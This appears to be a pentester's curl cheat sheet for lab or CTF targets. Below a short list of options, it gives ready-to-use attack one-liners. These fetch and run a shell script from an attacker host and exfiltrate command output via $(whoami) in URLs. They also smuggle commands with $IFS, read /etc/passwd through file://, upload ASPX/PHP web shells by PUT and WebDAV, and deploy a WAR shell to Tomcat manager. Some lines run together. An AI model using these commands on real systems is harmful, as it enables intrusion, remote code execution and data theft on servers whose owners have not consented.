Curl
Common commands
# -d, --data HTTP POST data
# -f, --fail Fail silently (no output at all) on HTTP errors
# -i, --include Include protocol response headers in the output
# -o, --output Write to file instead of stdout
# -O, --remote-name Write output to a file named as the remote file
# -s, --silent Silent mode
# -T, --upload-file Transfer local FILE to destination
# -A, --user-agent Send User-Agent <name> to server
# -v, --verbose Make the operation more talkative
# -V, --version Show version number and quit
# -u, --user <user:password> Server user and password
## ------------------| Download file
curl http://10.10.14.26/shell.sh -o /tmp/shell.sh
## ------------------| Read local files
curl file:///etc/passwd
## ------------------| Execute commands
curl http://10.10.14.26/$(whoami)
curl http://10.10.14.26/$(which$IFS'curl')
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php')
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh')
curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh)Use PUT command to upload file
curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx
curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx
# If DEV available ?
curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php
curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php
# Upload war file to tomcat
curl -u 'username:password' -T shell.war http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd Use MOVE command to move file
curl -X MOVE http://10.10.10.15/h4rithd.html -H 'Destination:http://10.10.10.15/h4rithd.aspx'.curlrcfile
## ------------------| Setup proxy
proxy = http://127.0.0.1:8080